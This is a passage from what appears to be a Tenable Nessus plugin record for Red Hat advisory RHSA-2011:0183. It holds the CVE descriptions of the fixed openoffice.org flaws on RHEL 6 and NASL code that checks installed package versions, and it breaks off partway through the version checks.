"p-cpe:/a:redhat:enterprise_linux:openoffice.org-pdfimport", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-en", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-kn_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-calc-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cs_CZ", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-pyuno", "p-cpe:/a:redhat:enterprise_linux:autocorr-fi", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-impress", "p-cpe:/a:redhat:enterprise_linux:autocorr-da", "p-cpe:/a:redhat:enterprise_linux:autocorr-af", "p-cpe:/a:redhat:enterprise_linux:autocorr-ru", "p-cpe:/a:redhat:enterprise_linux:autocorr-mn", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-es", "p-cpe:/a:redhat:enterprise_linux:autocorr-cs", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-af_ZA", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-writer-core", "p-cpe:/a:redhat:enterprise_linux:autocorr-pt", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-sdk-doc", "p-cpe:/a:redhat:enterprise_linux:autocorr-nl", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sl_SI", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-rhino", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ga_IE", "p-cpe:/a:redhat:enterprise_linux:autocorr-bg", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pl_PL", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-draw-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-el_GR", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-he_IL", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ko_KR", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-devel", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hi_IN", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nb_NO", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ru", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nn_NO", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ca_ES", "p-cpe:/a:redhat:enterprise_linux:autocorr-es", "cpe:/o:redhat:enterprise_linux:6.0", "p-cpe:/a:redhat:enterprise_linux:autocorr-eu", "p-cpe:/a:redhat:enterprise_linux:broffice.org-base", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-presenter-screen", "p-cpe:/a:redhat:enterprise_linux:autocorr-ko", "p-cpe:/a:redhat:enterprise_linux:autocorr-tr", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-impress-core", "p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ar"], "id": "REDHAT-RHSA-2011-0183.NASL", "href": "https://www.tenable.com/plugins/nessus/51827", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0183. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51827);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3450\", \"CVE-2010-3451\", \"CVE-2010-3452\", \"CVE-2010-3453\", \"CVE-2010-3454\", \"CVE-2010-3689\", \"CVE-2010-4253\", \"CVE-2010-4643\");\n script_xref(name:\"RHSA\", value:\"2011:0183\");\n\n script_name(english:\"RHEL 6 : openoffice.org (RHSA-2011:0183)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openoffice.org packages that fix multiple security issues and\none bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOpenOffice.org is an office productivity suite that includes desktop\napplications, such as a word processor, spreadsheet application,\npresentation manager, formula editor, and a drawing program.\n\nAn array index error and an integer signedness error were found in the\nway OpenOffice.org parsed certain Rich Text Format (RTF) files. An\nattacker could use these flaws to create a specially crafted RTF file\nthat, when opened, would cause OpenOffice.org to crash or, possibly,\nexecute arbitrary code with the privileges of the user running\nOpenOffice.org. (CVE-2010-3451, CVE-2010-3452)\n\nA heap-based buffer overflow flaw and an array index error were found\nin the way OpenOffice.org parsed certain Microsoft Office Word\ndocuments. An attacker could use these flaws to create a specially\ncrafted Microsoft Office Word document that, when opened, would cause\nOpenOffice.org to crash or, possibly, execute arbitrary code with the\nprivileges of the user running OpenOffice.org. (CVE-2010-3453,\nCVE-2010-3454)\n\nA heap-based buffer overflow flaw was found in the way OpenOffice.org\nparsed certain Microsoft Office PowerPoint files. An attacker could\nuse this flaw to create a specially crafted Microsoft Office\nPowerPoint file that, when opened, would cause OpenOffice.org to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning OpenOffice.org. (CVE-2010-4253)\n\nA heap-based buffer overflow flaw was found in the way OpenOffice.org\nparsed certain TARGA (Truevision TGA) files. An attacker could use\nthis flaw to create a specially crafted TARGA file. If a document\ncontaining this specially crafted TARGA file was opened, or if a user\ntried to insert the file into an existing document, it would cause\nOpenOffice.org to crash or, possibly, execute arbitrary code with the\nprivileges of the user running OpenOffice.org. (CVE-2010-4643)\n\nA directory traversal flaw was found in the way OpenOffice.org handled\nthe installation of XSLT filter descriptions packaged in Java Archive\n(JAR) files, as well as the installation of OpenOffice.org Extension\n(.oxt) files. An attacker could use these flaws to create a specially\ncrafted XSLT filter description or extension file that, when opened,\nwould cause the OpenOffice.org Extension Manager to modify files\naccessible to the user installing the JAR or extension file.\n(CVE-2010-3450)\n\nA flaw was found in the script that launches OpenOffice.org. In some\nsituations, a '.' character could be included in the LD_LIBRARY_PATH\nvariable, allowing a local attacker to execute arbitrary code with the\nprivileges of the user running OpenOffice.org, if that user ran\nOpenOffice.org from within an attacker-controlled directory.\n(CVE-2010-3689)\n\nRed Hat would like to thank OpenOffice.org for reporting the\nCVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454, and\nCVE-2010-4643 issues; and Dmitri Gribenko for reporting the\nCVE-2010-3689 issue. Upstream acknowledges Dan Rosenberg of Virtual\nSecurity Research as the original reporter of the CVE-2010-3451,\nCVE-2010-3452, CVE-2010-3453, and CVE-2010-3454 issues.\n\nThis update also fixes the following bug :\n\n* OpenOffice.org did not create a lock file when opening a file that\nwas on a share mounted via SFTP. Additionally, if there was a lock\nfile, it was ignored. This could result in data loss if a file in this\nsituation was opened simultaneously by another user. (BZ#671087)\n\nAll OpenOffice.org users are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAll running instances of OpenOffice.org applications must be restarted\nfor this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3450\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3453\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-4253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-4643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0183\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-en\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-fa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-ga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-lb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-mn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:autocorr-zh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-brand\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:broffice.org-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-base-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-brand\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-bsh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-calc-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-draw-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-emailmerge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-graphicfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-impress-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-javafilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-af_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-as_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bg_BG\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-bn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ca_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cs_CZ\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-cy_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-da_DK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-dz\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-el_GR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-en\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-et_EE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-eu_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fi_FI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gl_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-he_IL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hi_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hr_HR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-hu_HU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ja_JP\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-kn_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ko_KR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-lt_LT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-mai_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ml_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-mr_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ms_MY\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nr_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-nso_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-or_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pl_PL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sk_SK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sl_SI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ss_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-st_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ta_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-te_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-th_TH\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tn_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-tr_TR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ts_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ur\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-ve_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-xh_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-langpack-zu_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-math-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-ogltrans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-opensymbol-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-pdfimport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-presentation-minimizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-presenter-screen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-pyuno\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-report-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-rhino\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-sdk-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-testtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-ure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-wiki-publisher\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-writer-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openoffice.org-xsltfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0183\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-af-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-bg-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-cs-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-da-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-de-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-en-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-es-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-eu-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-fa-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-fi-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-fr-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-ga-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-hu-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-it-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-ja-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-ko-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-lb-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-lt-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-mn-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"autocorr-nl-3.2.1-19.6.el6_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", 